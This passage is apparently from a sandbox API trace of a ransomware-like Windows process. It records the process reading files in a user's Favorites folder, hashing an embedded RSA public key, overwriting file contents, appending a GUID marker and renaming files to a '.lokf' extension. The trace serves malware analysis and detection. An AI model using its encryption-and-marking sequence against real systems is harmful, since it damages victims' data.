| out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c858a8 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85878 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c858c0 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85890 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85890 [0059.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85890 | out: hHeap=0x660000) returned 1 [0059.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c858c0 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c858a8 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85878 | out: hHeap=0x660000) returned 1 [0059.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85860 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c882e0 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.736] WriteFile (in: hFile=0x5cc, lpBuffer=0x32adb18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x32adb18*, lpNumberOfBytesWritten=0x9f4fb14*=0x80, lpOverlapped=0x0) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.736] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.736] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.737] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.737] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.737] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.737] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.737] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.737] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.737] CloseHandle (hObject=0x5cc) returned 1 [0059.737] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.737] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.737] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0059.738] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.lokf")) returned 1 [0059.738] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.738] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.738] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.739] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201e90 | out: hHeap=0x660000) returned 1 [0059.739] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0059.739] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.739] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201e90 [0059.739] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.739] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0059.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.740] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.740] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.743] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.743] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.743] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.743] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.743] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.744] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.744] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.744] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.744] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.744] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.744] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.744] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.744] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.744] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.745] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.745] GetLastError () returned 0x0 [0059.745] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.745] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.745] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.745] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.745] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.745] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.745] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.745] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.745] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c882e0 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85860 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88328 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85878 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c858a8 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c858c0 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.745] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.745] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c858a8 | out: hHeap=0x660000) returned 1 [0059.745] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c858c0 | out: hHeap=0x660000) returned 1 [0059.745] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c858c0 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c858a8 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c858c0 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c858a8 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.746] GetCurrentThreadId () returned 0x9e0 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84658 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.747] GetCurrentThreadId () returned 0x9e0 [0059.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.747] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.747] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.747] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.747] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.747] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.747] CloseHandle (hObject=0x5cc) returned 1 [0059.748] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 